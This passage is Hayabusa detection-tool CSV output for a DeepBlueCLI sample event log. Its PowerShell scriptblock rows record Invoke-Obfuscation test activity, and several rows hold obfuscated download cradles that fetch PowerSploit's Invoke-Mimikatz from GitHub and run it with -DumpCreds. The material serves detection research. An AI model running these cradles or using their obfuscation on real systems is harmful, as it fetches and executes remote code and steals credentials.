Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:39.237 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent 
@{logname=""Microsoft-Windows-PowerShell/Operational"";ID=4104}|fl|more",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:47.492 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:17:57.725 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{If((Get-Random -Minimum 0 -Maximum 2) -eq 0) {([String]$_).ToUpper()} Else {([String]$_).ToLower()}},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:18:01.084 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".((Gv '*mDR*').nAmE[3,11,2]-jOiN'')((('IEX (New'+'-Ob'+'jec'+'t Net.WebClient).DownloadString({0}ht'+'tps://'+'raw.git'+'hubus'+'ercontent.com/mattifest'+'ation/Po'+'werSploit/ma'+'st'+'er/Exfil'+'t'+'r'+'ati'+'on/Invoke'+'-Mimika'+'t'+'z'+'.ps1{'+'0}); Inv'+'oke-'+'Mi'+'m'+'ikat'+'z -Dum'+'p'+'Creds') -f[cHaR]39))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:18:19.204 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:18:44.958 
+09:00,SEC511,4104,info,,PwSh Scriptblock Log,"&( $PsHome[4]+$pshOME[34]+'X') ((((""{64}{90}{3}{91}{14}{40}{67}{6}{37}{36}{22}{87}{60}{10}{35}{57}{43}{44}{41}{7}{19}{50}{68}{12}{0}{31}{85}{88}{72}{25}{63}{32}{5}{39}{46}{65}{26}{42}{30}{77}{76}{15}{73}{75}{82}{86}{4}{70}{51}{47}{13}{56}{89}{66}{83}{49}{1}{34}{27}{79}{20}{11}{59}{45}{17}{24}{84}{33}{21}{48}{71}{18}{23}{16}{28}{29}{80}{74}{2}{38}{81}{54}{62}{78}{69}{52}{61}{53}{9}{58}{55}{8}"" -f'r','tiyJa','Ja','a*mDR*yJa).nAmE','it/ma','tyJ','IEX (New','ient)',')) ','CredsyJa','a','-M','dSt','J','3,11','J','nvyJa','t','yJa0','.D','keyJa+yJa','yJa+yJ','-ObyJa+','}); I','yJa','yJatps://yJa','aercontent.com','yJ','+','yJaoke-yJa+','ma','i','gi','z','+','+','Ja','yJa+y','myJa','a+yJahub',',2]-jOiNyJayJ','ebCl','/','at Ne','t.W','Ja+yJa','usyJa+','ty','a.ps1','yJa+yJaa','ow','Jas','DumyJa+yJa','yJa','Ja','cHaR]39','a+yJaer/','yJ',') -f[','imikay','ecyJ','pyJa+','ikaty','+yJaraw.','.','yJ','xfilyJa+yJatyJa+','a)(((yJa','nloa','Jaz -','yJa+y','{yJa+','}htyJa+','a+yJaat','yJa+y','ion/','sty','ttife','Ja+y','aon/Invo','yJaMi','+y','PoyJa','yJar','+yJa','ng({','+yJawerSplo','yJaj','0','E','((Gv yJ','[')) -cRepLAce ([ChaR]121+[ChaR]74+[ChaR]97),[ChaR]39))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:18:50.150 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:05.622 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Set-vaRiablE (""2K""+""h8"") ( ""NoIsSeRpxE-EkOVnI | )63]RAhc[,'6V0' eCALpER- 43]RAhc[,'t3a'eCALpER- 93]RAhc[,)17]RAhc[+48]RAhc[+37]RAhc[( ecalPerC- )' ))93]RahC[,)79]RahC[+47]RahC[+121'+']RahC[( ecALpeRc- ))G'+'TI['+'GTI,GTIJy 
vG((GTI,GTIEGTI,GTI0GTI,GTIjaJyGTI,GTIolpSrewaJy+GTI,GTI{(gnGTI,GTIa'+'Jy+GTI,GTIraJyGTI,GTIaJ'+'yoPGTI,GTIy+GTI,GTIiMaJyGTI,GTIovnI/noaGTI,GTIy+aJGTI,GTIefittGTI,GTIytsGTI,GTI/noiGTI,GTIy+aJyGTI,GTItaaJ'+'y+aGTI,GTI+aJyth}GTI,GTI+aJy{GTI,GTIy+aJyGTI,GTI- zaJGTI,GTIaolnGTI,GTIaJy((()aGTI,GTI+aJytaJy+aJylifxGTI,GTIJyGTI,GTI.GTI,GTI.waraJy+GTI,GT'+'IytakiGTI,GTI+aJypGTI,GTIJyceGTI,G'+'TIyakimiGTI,GTI[f- )GTI,GTIJyGTI,GTI/reaJ'+'y+aGTI,GTI93]RaHcGTI,GTIaJGTI,GTIaJyGTI'+',GTIaJy+a'+'Jym'+'uDGTI,GTIsaJGTI,GTIwoGT'+'I,GTIaaJy+aJyGT'+'I,GTI1sp.aGTI,GTIytGTI,GTI+aJys'+'uGTI,GTIaJy+aJGTI,GTIW.tGTI,GTIeN taGTI,GTI/GTI,GTIlCbeGTI,GTIJyaJy'+'NiOj-]2,GTI,GTIbuhaJy+aGTI,GTIaJymGTI,GTIy+aJyGTI,GTIaJGTI,GTI+GTI,GTI+GTI,GTIzGTI,GTIigGTI,GTIiGTI,GTIamGTI,GTI+aJy-ekoaJyGTI,GTI+GTI,GTIJyGTI,GTImoc.tnetnocreaGTI,GTIaJy//:sptaJyGTI,GT'+'IaJyGTI,GTII ;)}GTI,GTI+aJybO-GTI,GTI'+'J'+'y+aJyGTI,GTIaJy+aJyekGTI'+',GTID.GTI,GTI0aJyGTI,GTI'+'tGTI,GTIaJyvnGTI,GTIJGTI,GTI11,3GTI,GTIJGTI,GTItSdGTI,GTIM-GTI,GTIaGTI,GTIaJysderCGTI,GTI ))GTI,GTI)tneiGTI,GTIweN( XEIGTI,GTIJytGTI'+',GTIam/tiGTI'+',GTIEmAn.)aJy*RDm*aGTI,GTIaJGTI,GTIaJyitGTI,GTIrGTIf- t3a}8{}'+'55{}85{}9{}35{}16{}25{}96{}87{}26{}45{}18{}83{}2{}47'+'{}08{}92{}82{}61{}32{}81{}17{}84{}12{}'+'33{}48{}42{}71{}54{}9'+'5{}11{}02{}9'+'7{}72{}43{}1{}94{}38{}66{}98{}65{}31{}74{}15{}07{}4{}68{}28{}57{}37{}51{}67{}77{}03{}24{}62{}56{}64{}93'+'{}5{}23{}36{}52{}27{}88{}58{}13'+'{}0{}21{}86{}05{}91{}7{}14{}44{}34{}75{}53{}0'+'1{}06{}78{}22{}63{}73{}6{}76{}04{}41{}19{}3{}09{}46{t3a(((( )GTIXGTI+]43[EMOhsp6V0+]4[emoHsP6V0 (&'(("" ); .( $pshOME[4]+$PshOMe[34]+'x')( [STRInG]::jOiN( '', ( variabLE (""2K""+""H8"")).VAluE[ -1 ..-(( variabLE (""2K""+""H8"")).VAluE.leNGTH) ]) )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:05.642 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"(('&( 
0V6PsHome[4]+0V6pshOME[34]+ITGXITG) ((((a3t{64}{90}{3}{91}{14}{40}{67}{6}{37}{36}{22}{87}{60}{1'+'0}{35}{57}{43}{44}{41}{7}{19}{50}{68}{12}{0}{'+'31}{85}{88}{72}{25}{63}{32}{5}{'+'39}{46}{65}{26}{42}{30}{77}{76}{15}{73}{75}{82}{86}{4}{70}{51}{47}{13}{56}{89}{66}{83}{49}{1}{34}{27}{7'+'9}{20}{11}{5'+'9}{45}{17}{24}{84}{33'+'}{21}{48}{71}{18}{23}{16}{28}{29}{80}{'+'74}{2}{38}{81}{54}{62}{78}{69}{52}{61}{53}{9}{58}{55'+'}{8}a3t -fITGrITG,ITGtiyJaITG,ITGJaITG,ITGa*mDR*yJa).nAmEITG,'+'ITGit/maITG,'+'ITGtyJITG,ITGIEX (NewITG,ITGient)ITG,ITG)) ITG,ITGCredsyJaITG,ITGaITG,ITG-MITG,ITGdStITG,ITGJITG,ITG3,11ITG,ITGJITG,ITGnvyJaITG,ITGt'+'ITG,ITGyJa0ITG,ITG.DITG,'+'ITGkeyJa+yJaITG,ITGyJa+y'+'J'+'ITG,ITG-ObyJa+ITG,ITG}); IITG,ITGyJaI'+'TG,ITGyJatps://yJaITG,ITGaercontent.comITG,ITGyJITG,ITG+ITG,ITGyJaoke-yJa+ITG,ITGmaITG,ITGiITG,ITGgiITG,ITGzITG,ITG+ITG,ITG+ITG,ITGJaITG,ITGyJa+yITG,ITGmyJaITG,ITGa+yJahubITG,ITG,2]-jOiN'+'yJayJITG,ITGebClITG,ITG/ITG,ITGat NeITG,ITGt.WITG,ITGJa+yJaITG,ITGu'+'syJa+ITG,ITGtyITG,ITGa.ps1ITG,I'+'TGyJa+yJaaITG,I'+'TGowITG,ITGJasITG,ITGDu'+'myJ'+'a+yJaITG,'+'ITGyJaITG,ITGJaITG,ITGcHaR]39ITG,ITGa+y'+'Jaer/ITG,ITGyJITG,ITG) -f[ITG,ITGimikayIT'+'G,ITGecyJITG,ITGpyJa+ITG,ITGikatyI'+'TG,ITG+yJaraw.ITG,ITG.ITG,ITGyJITG,ITGxfilyJa+yJatyJa+ITG,ITGa)(((yJaITG,ITGnloaITG,ITGJaz -ITG,ITGyJa+yITG,ITG{yJa+ITG,ITG}htyJa+ITG,ITGa+y'+'JaatITG,ITGyJa+yITG,ITGion/ITG,ITGstyITG,ITGttifeITG,ITGJa+yITG,ITGaon/InvoITG,ITGyJaMiITG,ITG+yITG,ITGPoy'+'JaITG,ITGyJarITG,ITG+yJ'+'aITG,ITGng({ITG,ITG+yJawerSploITG,ITGyJajITG,ITG0ITG,ITGEITG,ITG((Gv yJITG,ITG'+'[IT'+'G)) -cRepLAce ([ChaR]'+'121+[ChaR]74+[ChaR]97),[ChaR]39)) ') -CrePlace ([chAR]73+[chAR]84+[chAR]71),[chAR]39 -REpLACe'a3t',[chAR]34 -REpLACe '0V6',[chAR]36) | InVOkE-ExpReSsIoN",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:25.754 +09:00,SEC511,4104,info,,PwSh 
Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:43.056 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:43.075 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$DelimitedEncodedArray += ([String]([Int][Char]$_) + (Get-Random -Input $RandomDelimiters))},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:44.154 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:44.166 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:44.171 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} 
$Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:44.174 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:44.176 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:44.180 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:44.181 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:44.236 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([String]([Int][Char]$_) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:46.183 
+09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:46.196 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:19:46.238 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:20:18.176 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:15.729 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:15.743 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input 
$RandomDelimiters))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:16.186 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:16.194 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:16.199 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:16.202 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:16.205 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:16.208 
+09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:16.212 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:16.222 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:16.253 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:16.268 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ # Encapsulate current item with single quote if it contains a non-integer. 
If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:17.070 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:17.087 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:17.127 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:22.147 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".( $PsHOME[21]+$pShOMe[30]+'x')( "" $( SET-ITeM 'vAriabLE:OFs' '')"" 
+[sTRing]('26K28!20%24l65J4e:76&3ai43i6f!4di73K50%45J63J5b:34!2cl31l35%2c&32i35%5d&2d!4aK4fJ69i6e&27l27%29&20!28i5bl73:54l52%49i4eJ67l5d%3a%3ai4a%4f:49K6el28K20:27&27:2ci20:28!28l37%33J2ci20!36l39!20:2c&38:38K20!2c!33:32K2ci20l34!30K20i2c&37i38&2c%31!30!31l2c:31:31K39J2cK34!35&2cJ37i39&20l2c%20l39J38l2cJ31%30K36i20J2cK31K30:31%2c!39i39&2ci31l31l36&2cl20J33&32!2c:20%37:38!20%2c!31i30i31i20:2c:20:31%31:36K2ci34l36K20:2cl38l37l2cJ31J30K31:20i2cl39K38l2cJ36&37%2c:20!31!30%38l2ci31&30!35%20%2c:20%31&30%31l2c!20K31&31K30!20&2c!31:31%36i20&2c!34:31l20J2c!34%36:2cl20&36!38!2c!20%31%31:31l2c!20l31&31i39:20J2cJ31&31i30K20J2c&31!30!38i20K2cK31&31J31:2cK20K39J37%2ci20K31K30K30K2c&20K38&33l20:2cJ20i31l31J36!20K2ci31:31!34!2c%20&31J30%35&20:2c&31l31:30:2cK31:30l33&20J2cK34i30l20J2c&33l39K2c&20!31:30&34J2c%31l31l36&20i2c&31i31i36i2c!31l31:32i2c!20l31i31!35&20l2c%35J38!2c:20%34!37!2c&20K34K37:20K2cl20%31%31!34:2c&39J37:20l2cK20K31J31i39l2c&20&34J36:20i2cJ20!31:30&33&2cJ31l30i35J20%2c!20l31i31K36!2cJ20i31J30K34%20:2cl31K31%37J2cl20:39i38:20i2c%31l31:37!2c!31i31!35i2c%20!31J30!31l2c!31i31%34:20i2cJ20!39!39i2c&20J31K31!31:2cJ20l31K31l30K2c:31l31&36J20:2c:31l30K31&2c%31l31:30:20l2c%20!31J31!36l20!2c&20!34K36%2cK20i39:39K2cJ20K31!31i31!20:2c!20!31i30!39%2ci34i37!2cJ20K31:30i39!2c&39J37!20i2ci20&31K31J36l2cl31J31&36K20&2cK20i31l30K35K20i2cJ20%31l30J32i20J2c!31K30i31K2ci31%31%35l2ci20:31i31K36l2cJ20J39&37:20!2ci31l31J36l20J2c%20:31%30&35!20:2ci31&31i31!2cK20l31!31l30!2c!20i34J37J20:2cl20:38:30J2ci31%31!31K20K2c!31J31i39!2ci31&30i31K20!2ci20%31%31l34%20&2c&20J38&33:2c%20!31&31:32K2cK20&31:30:38i2ci20i31l31J31i2cl31l30l35l2c&20&31&31!36%2ci20&34J37%20:2cJ31K30:39J2cK20!39%37&2cK20:31:31&35&2cK20!31%31:36J20%2c!20i31K30K31i20!2c:31%31!34:20K2cl20&34&37i20J2c&20l36l39K20!2ci20J31!32J30K2c!31:30i32&2cJ20i31i30%35!20K2c!31K30l38:20l2c!31!31l36%20%2c!20i31K31&34%2c%20J39%37J2c!20%31l31&36:20%2cl20K31%30%35!2ci31:31i31:2c:31K31%30i20!2cK20i34%37i20!2c:37K33&20:2cJ31&31K30K2c:31!31%38l20%2c:20i31l
31K31%2c%31K30&37:20:2c!20&31&30l31%20l2cl20:34J35%20:2c!37l37J20%2cl31%30&35:2c&31J30%39!2ci20i31:30J35i2c!20%31:30%37%20%2c%20!39K37!20i2c:31i31!36J20:2c&20i31K32J32%2c%20:34%36J2c!31:31i32%2cJ20!31l31&35i20l2cJ20:34:39i2c%20J33&39&20J2cl20i34l31&20:2cK20!35K39l2cJ33K32l20&2c%20!37l33K20:2cK20!31J31:30&20&2ci31:31%38:2c!31K31J31l20!2c!31&30i37!2c!20%31!30%31!20l2ci20&34l35K2cl37:37!2c!20:31i30J35:20&2c!31%30&39J2c%31%30:35&20:2c!20l31:30l37i20!2c:20J39%37%2cJ20:31%31%36K2ci20J31l32:32!2ci33!32!20l2c:34%35K2ci20l36%38l20J2cK20&31i31i37&20&2c!20J31i30:39l2cJ20%31:31i32l2c&36K37i2cl31!31l34l20%2c:31:30&31l2cl31i30&30%20!2c:31l31!35i20:29l7c!66%4f&52l45%61J43l68!2dl4f%62K6aK65:63i74%20:7b!20%28:5bJ49!6e:74i5d!24i5f%20i2di61:53%5bK43K48%41%52&5d:29%20&7d!29J20J29J20!29&20'.split('&K%:Ji!l' )|fOReAcH {( [cONveRt]::tOinT16( ( $_.tOstriNg()),16) -aS [cHar]) }) +""$(SeT-itEM 'VARiable:oFS' ' ') "" )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:22.154 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{( [cONveRt]::tOinT16( ( $_.tOstriNg()),16) -aS [cHar]) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:22.178 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"&( $eNv:CoMsPEc[4,15,25]-JOin'') ([sTRINg]::JOIn( '', ((73, 69 ,88 ,32, 40 ,78,101,119,45,79 , 98,106 ,101,99,116, 32, 78 ,101 , 116,46 ,87,101 ,98,67, 108,105 , 101, 110 ,116 ,41 ,46, 68, 111, 119 ,110 ,108 ,111, 97, 100, 83 , 116 ,114, 105 ,110,103 ,40 ,39, 104,116 ,116,112, 115 ,58, 47, 47 , 114,97 , 119, 46 , 103,105 , 116, 104 ,117, 98 ,117,115, 101,114 , 99, 111, 110,116 ,101,110 , 116 , 46, 99, 111 , 109,47, 109,97 , 116,116 , 105 , 102 ,101,115, 116, 97 ,116 , 105 ,111, 110, 47 , 80,111 ,119,101 , 114 , 83, 112, 
